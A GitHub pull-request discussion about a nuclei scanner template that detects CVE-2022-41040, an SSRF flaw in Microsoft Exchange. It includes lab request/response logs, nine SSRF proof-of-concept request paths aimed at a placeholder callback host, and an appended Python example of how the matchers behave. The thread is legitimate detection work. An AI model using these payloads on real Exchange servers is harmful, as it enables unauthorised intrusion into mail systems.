
Added CVE-2022-41040 #8595

Open. Wants to merge 7 commits into base: main.

Conversation

PhillipoTF2 (Contributor)

Template / PR Information

I have created a template for CVE-2022-41040, which was added to CISA's KEV on 09/30/2022.
I have not properly validated this template however I have high confidence that this will work.

Any feedback is greatly appreciated :)

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@princechaddha princechaddha self-assigned this Nov 16, 2023
Updated to fix matchers-condition
@PhillipoTF2 (Contributor, Author)

Edited the matcher condition so it matches on both 404 status code and the presence of "protocol" in the body.

@S4lt5 (Contributor)

S4lt5 commented Dec 13, 2023

I think the string matcher needs to be more finely grained.

e.g.

404:
"Cannot GET /autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync"

is a positive match on a lot of servers that absolutely aren't anything to do with Exchange

Updated to include checks for Microsoft Exchange (Essentially a copy paste of /http/technologies/microsoft/ms-exchange-server.yaml)
@PhillipoTF2 (Contributor, Author)

> I think the string matcher needs to be more finely grained.
>
> e.g.
>
> 404:
> "Cannot GET /autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync"
>
> is a positive match on a lot of servers that absolutely aren't anything to do with Exchange

I have updated the template to include the checks for Microsoft Exchange (Pinched from http/technologies/microsoft/ms-exchange-server.yaml). This should hopefully reduce said false positives. Any further feedback would be amazing :)

Updated matchers to check for "X-Feserver" in header.
@PhillipoTF2 (Contributor, Author)

Updated the template to check for "X-Feserver" in the response headers. Here are the results of my tests using a vulnerable Exchange server (running Exchange 2016 CU 16) and a patched server (running Exchange 2016 CU 23 with security patch KB5019758).

#-------------------------------
# Vulnerable MS-EX 2016 (CU-16)
#-------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.7.6 (latest)
[INF] New templates added in latest release: 49
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.189
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 302 Found
Connection: close
Content-Length: 714
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Mon, 04 Mar 2024 20:02:06 GMT
Expires: -1
Location: /owa/auth/errorfe.aspx?httpCode=500&msg=3529056431&msgParam=NT+AUTHORITY%5cSYSTEM&owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&owaVer=15.1.1713.5&be=WIN-834SULVBKJH&ts=133540561263308050&fe=WIN-834SULVBKJH&reqid=3c9badb0-7c24-4ad3-91bf-16f8cb784685&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=DagNotFound&forest=test.org&te=0&refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell
Pragma: no-cache
Request-Id: 3c9badb0-7c24-4ad3-91bf-16f8cb784685
Server: Microsoft-IIS/10.0
Set-Cookie: ClientId=1363C16AFD554DFDA479E5513A31FACD; expires=Tue, 04-Mar-2025 20:02:06 GMT; path=/; secure
Set-Cookie: X-BackEndCookie=; expires=Fri, 04-Mar-1994 20:02:06 GMT; path=/autodiscover; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Backend-Begin: 2024-03-04T12:02:06.272
X-Backend-End: 2024-03-04T12:02:06.340
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Content-Type-Options: nosniff
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Owa-Diagnosticsinfo: 67;5;0
X-Owa-Error: Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException,Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
X-Owasupplevel: TenantAdmin
X-Powered-By: ASP.NET
X-Ua-Compatible: IE=EmulateIE7

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorfe.aspx?httpCode=500&amp;msg=3529056431&amp;msgParam=NT+AUTHORITY%5cSYSTEM&amp;owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&amp;owaVer=15.1.1713.5&amp;be=WIN-834SULVBKJH&amp;ts=133540561263308050&amp;fe=WIN-834SULVBKJH&amp;reqid=3c9badb0-7c24-4ad3-91bf-16f8cb784685&amp;creqid=&amp;cid=&amp;rt=Form15&amp;et=DefaultPage&amp;pal=0&amp;dag=DagNotFound&amp;forest=test.org&amp;te=0&amp;refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell">here</a>.</h2>
</body></html>
[CVE-2022-41040:status-1] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell


#-----------------------------------
# Patched MS-EX 2016 (CU 23 w/ patch)
#-----------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.7.6 (latest)
[INF] New templates added in latest release: 49
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.77
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Tue, 05 Mar 2024 00:24:07 GMT
Request-Id: dec11fa8-7d29-402a-b14b-df37759efe3a
Server: Microsoft-IIS/10.0
Set-Cookie: X-BackEndCookie=; expires=Sat, 05-Mar-1994 00:24:07 GMT; path=/autodiscover; secure; HttpOnly
Vary: Accept-Encoding
X-Aspnet-Version: 4.0.30319
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Powered-By: ASP.NET

{"Protocol":"XYZ","Url":"https://win-834sulvbkjh.test.org/api"}
[INF] No results found. Better luck next time!
@PhillipoTF2 (Contributor, Author)

Hi All,
I have updated this template as the previous matchers were insufficient.

#-------------------------------
# Vulnerable MS-EX 2016 (CU-16)
#-------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Your current nuclei-templates v9.7.8 are outdated. Latest is v9.8.0
[INF] Successfully updated nuclei-templates (v9.8.0) to /Users/lukephillips/nuclei-templates. GoodLuck!
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.8.0 (latest)
[INF] New templates added in latest release: 85
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.189
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 302 Found
Connection: close
Content-Length: 714
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Mar 2024 17:21:54 GMT
Expires: -1
Location: /owa/auth/errorfe.aspx?httpCode=500&msg=3529056431&msgParam=NT+AUTHORITY%5cSYSTEM&owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&owaVer=15.1.1713.5&be=WIN-834SULVBKJH&ts=133558609155988862&fe=WIN-834SULVBKJH&reqid=53657dd4-77fb-4224-988f-e2c325a30722&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=DagNotFound&forest=test.org&te=0&refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell
Pragma: no-cache
Request-Id: 53657dd4-77fb-4224-988f-e2c325a30722
Server: Microsoft-IIS/10.0
Set-Cookie: ClientId=0C2987064A874D599B72B7D603B1E96F; expires=Tue, 25-Mar-2025 17:21:55 GMT; path=/; secure
Set-Cookie: X-BackEndCookie=; expires=Fri, 25-Mar-1994 17:21:55 GMT; path=/autodiscover; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Backend-Begin: 2024-03-25T10:21:55.141
X-Backend-End: 2024-03-25T10:21:55.631
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Content-Type-Options: nosniff
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Owa-Diagnosticsinfo: 464;15;0
X-Owa-Error: Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException,Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
X-Owasupplevel: TenantAdmin
X-Powered-By: ASP.NET
X-Ua-Compatible: IE=EmulateIE7

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorfe.aspx?httpCode=500&amp;msg=3529056431&amp;msgParam=NT+AUTHORITY%5cSYSTEM&amp;owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&amp;owaVer=15.1.1713.5&amp;be=WIN-834SULVBKJH&amp;ts=133558609155988862&amp;fe=WIN-834SULVBKJH&amp;reqid=53657dd4-77fb-4224-988f-e2c325a30722&amp;creqid=&amp;cid=&amp;rt=Form15&amp;et=DefaultPage&amp;pal=0&amp;dag=DagNotFound&amp;forest=test.org&amp;te=0&amp;refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell">here</a>.</h2>
</body></html>
[CVE-2022-41040:word-1] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell
[0:00:01] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 1 | Errors: 0 | Requests: 1/1 (100%)




#-----------------------------------
# Patched MS-EX 2016 (CU 23 w/ patch)
#-----------------------------------
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.8.0 (latest)
[INF] New templates added in latest release: 85
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 0/1 (0%)
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.77
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Mon, 25 Mar 2024 17:37:41 GMT
Request-Id: 886084ae-3787-424f-aafd-4548bb3021e7
Server: Microsoft-IIS/10.0
Set-Cookie: X-BackEndCookie=; expires=Fri, 25-Mar-1994 17:37:41 GMT; path=/autodiscover; secure; HttpOnly
Vary: Accept-Encoding
X-Aspnet-Version: 4.0.30319
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Powered-By: ASP.NET

{"Protocol":"XYZ","Url":"https://win-834sulvbkjh.test.org/api"}
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 1/1 (100%)
[INF] No results found. Better luck next time!
@princechaddha (Member)

@PhillipoTF2, the response time to this PR was much longer than usual.

In this repository, we strive to include CVEs with complete PoCs, and the shared templates do not confirm SSRF. If you have a vulnerable environment set up, could you confirm whether the following PoCs are working?

Ref: https://github.com/kljunowsky/CVE-2022-41040-POC

/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
@PhillipoTF2 (Contributor, Author)

> @PhillipoTF2, the response time to this PR was much longer than usual.
>
> In this repository, we strive to include CVEs with complete PoCs, and the shared templates do not confirm SSRF. If you have a vulnerable environment set up, could you confirm whether the following PoCs are working?
>
> Ref: https://github.com/kljunowsky/CVE-2022-41040-POC
>
> /autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
> /autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
> /autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
> /autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
> /autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
> /autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
> /autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
> /autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
> /autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell

Sorry for the delay on testing this.
I have updated this template to use the PoC as described above and tested this on a patched Exchange 2016 server (CU 23 w/ patch) and a vulnerable Exchange 2016 server (CU 12). The template works as expected for both of these cases (Positive result for the vulnerable server and no results for the patched server). I will be setting up a test environment for Exchange 2019 and Exchange 2013 later this week or early next week, so I will be testing the template on those too once those have been set up correctly.

@PhillipoTF2 (Contributor, Author)

G'day All,
I have (finally) got around to testing this on Exchange 2019 as well. It works exactly as I would expect.
Are there any issues you can spot? From what I can tell this follows the PoC and correctly flags up the vulnerable versions of Exchange 2016 and 2019.

-----------------------------------
MS Exchange 2019 CU 10 (Vulnerable)
-----------------------------------

[CVE-2022-41040:status-1] [http] [high] https://192.168.1.33/autodiscover/autodiscover.json?@192.168.1.33/&Email=autodiscover/autodiscover.json%3f@192.168.1.33
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.33/autodiscover/autodiscover.json?@192.168.1.33/&Email=autodiscover/autodiscover.json%3f@192.168.1.33
[0:00:07] | Templates: 1 | Hosts: 1 | RPS: 1 | Matched: 2 | Errors: 0 | Requests: 10/10 (100%)


---------------------------------
MS Exchange 2019 CU 14 (Patched)
---------------------------------

[0:00:10] | Templates: 1 | Hosts: 1 | RPS: 1 | Matched: 0 | Errors: 0 | Requests: 10/10 (100%)
[INF] No results found. Better luck next time!


-----------------------------------
MS Exchange 2016 CU 23 (Vulnerable)
-----------------------------------

[CVE-2022-41040:status-1] [http] [high] https://192.168.1.28/autodiscover/autodiscover.json?@192.168.1.28/&Email=autodiscover/autodiscover.json%3f@192.168.1.28
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.28/autodiscover/autodiscover.json?@192.168.1.28/&Email=autodiscover/autodiscover.json%3f@192.168.1.28
[0:00:18] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 2 | Errors: 1 | Requests: 10/10 (100%)

--------------------------------
MS Exchange 2016 CU 23 (Patched)
--------------------------------

[0:00:13] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 10/10 (100%)
[INF] No results found. Better luck next time!

@rxerium (Contributor)

rxerium commented Jun 3, 2024

I've been following this PR for a while, when you have some time @princechaddha would you be able to review this so we can look to merge? Thanks!

@princechaddha (Member)

This PR is on hold because the following matchers look weak and can produce false positives. Additionally, they do not confirm any callback, so SSRF is not validated. @PhillipoTF2, can you share a template that confirms SSRF and works on the vulnerable version only?

Also, it would be helpful in validating if you share debug data for both hosts. cc @rxerium

    matchers:
      - type: status
        status:
          - 404
      - type: word
        part: body
        words: 
          - 'IIS Web Core'
    matchers-condition: and
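Added example (editor's addition, not the PR's template and not nuclei's own code): a small Python evaluator for the `status` / `word` matcher shapes and `matchers-condition` quoted in the review comment above. It runs the quoted 404 + 'IIS Web Core' pair and an X-FEServer header check over three constructed responses: a stock IIS detailed-error 404 page with no Exchange installed (the kind of host S4lt5's false-positive report concerns), and the 302 and 200 responses the PR author captured from the vulnerable and patched hosts. It shows that the weak pair fires on the non-Exchange host, and that the header check only fingerprints Exchange without separating patched from vulnerable; as the comment says, none of these in-band checks confirms a callback, so SSRF stays unvalidated. The response bodies and the matcher semantics below are constructed for illustration.

```python
"""Minimal evaluator for nuclei-style HTTP matchers (constructed example, not nuclei's code)."""
from dataclasses import dataclass, field


@dataclass
class Response:
    """The parts of an HTTP response the matchers look at."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def _header_block(resp: Response) -> str:
    # `part: header` matches against the raw header lines; header names are
    # case-insensitive, so the comparison is done in lower case.
    return "\n".join(f"{k}: {v}" for k, v in resp.headers.items()).lower()


def match_one(matcher: dict, resp: Response) -> bool:
    """Evaluate one matcher written in the template's YAML shape."""
    if matcher["type"] == "status":
        return resp.status in matcher["status"]
    if matcher["type"] == "word":
        if matcher.get("part", "body") == "header":
            haystack = _header_block(resp)
            words = [w.lower() for w in matcher["words"]]
        else:
            haystack = resp.body
            words = matcher["words"]
        hits = [w in haystack for w in words]
        # a word matcher's own `condition` defaults to "or" (any listed word)
        return all(hits) if matcher.get("condition", "or") == "and" else any(hits)
    raise ValueError(f"unsupported matcher type: {matcher['type']}")


def evaluate(matchers: list, resp: Response, matchers_condition: str = "or") -> bool:
    """Combine all matchers with `matchers-condition` ("and" or "or")."""
    results = [match_one(m, resp) for m in matchers]
    return all(results) if matchers_condition == "and" else any(results)


# Constructed: a stock IIS "detailed error" 404 page from a host with no
# Exchange at all. The page names the failing module, which is where the
# string 'IIS Web Core' comes from on any IIS box with detailed errors on.
GENERIC_IIS_404 = Response(
    status=404,
    headers={"Server": "Microsoft-IIS/10.0", "X-Powered-By": "ASP.NET"},
    body="<h3>Module</h3><p>IIS Web Core</p><h3>Notification</h3><p>MapRequestHandler</p>",
)

# Constructed from the PR's vulnerable-host debug output (Exchange 2016 CU 16):
# a 302 to errorfe.aspx with the front-end server header present.
VULNERABLE_EXCHANGE_302 = Response(
    status=302,
    headers={"Server": "Microsoft-IIS/10.0", "X-Feserver": "WIN-834SULVBKJH",
             "Location": "/owa/auth/errorfe.aspx?httpCode=500"},
    body="<html><head><title>Object moved</title></head><body></body></html>",
)

# Constructed from the PR's patched-host debug output (CU 23 + KB5019758):
# a 200 with a JSON body, and the very same X-Feserver header.
PATCHED_EXCHANGE_200 = Response(
    status=200,
    headers={"Server": "Microsoft-IIS/10.0", "X-Feserver": "WIN-834SULVBKJH",
             "Content-Type": "application/json; charset=utf-8"},
    body='{"Protocol":"XYZ","Url":"https://win-834sulvbkjh.test.org/api"}',
)

# The matcher pair quoted in the review comment.
WEAK_MATCHERS = [
    {"type": "status", "status": [404]},
    {"type": "word", "part": "body", "words": ["IIS Web Core"]},
]

# A product fingerprint only: Exchange's front-end header.
FINGERPRINT_MATCHERS = [
    {"type": "word", "part": "header", "words": ["X-FEServer"]},
]


def weak_pair_fires_on_generic_iis() -> bool:
    """True means the quoted matchers flag a host that runs no Exchange at all."""
    return evaluate(WEAK_MATCHERS, GENERIC_IIS_404, "and")


def fingerprint_results() -> dict:
    """The header check separates Exchange from non-Exchange, not patched from vulnerable."""
    return {
        "generic_iis": evaluate(FINGERPRINT_MATCHERS, GENERIC_IIS_404, "and"),
        "vulnerable_exchange": evaluate(FINGERPRINT_MATCHERS, VULNERABLE_EXCHANGE_302, "and"),
        "patched_exchange": evaluate(FINGERPRINT_MATCHERS, PATCHED_EXCHANGE_200, "and"),
    }


if __name__ == "__main__":
    print("weak 404 + 'IIS Web Core' pair on generic IIS 404:", weak_pair_fires_on_generic_iis())
    for host, hit in fingerprint_results().items():
        print(f"X-FEServer fingerprint on {host}: {hit}")
```

Run stand-alone it reports the weak pair matching the non-Exchange host and the fingerprint matching both Exchange hosts equally, which is the reviewer's point: a status code and a static string (or a product header) describe the software, not the vulnerability, and only a received out-of-band callback would confirm the SSRF.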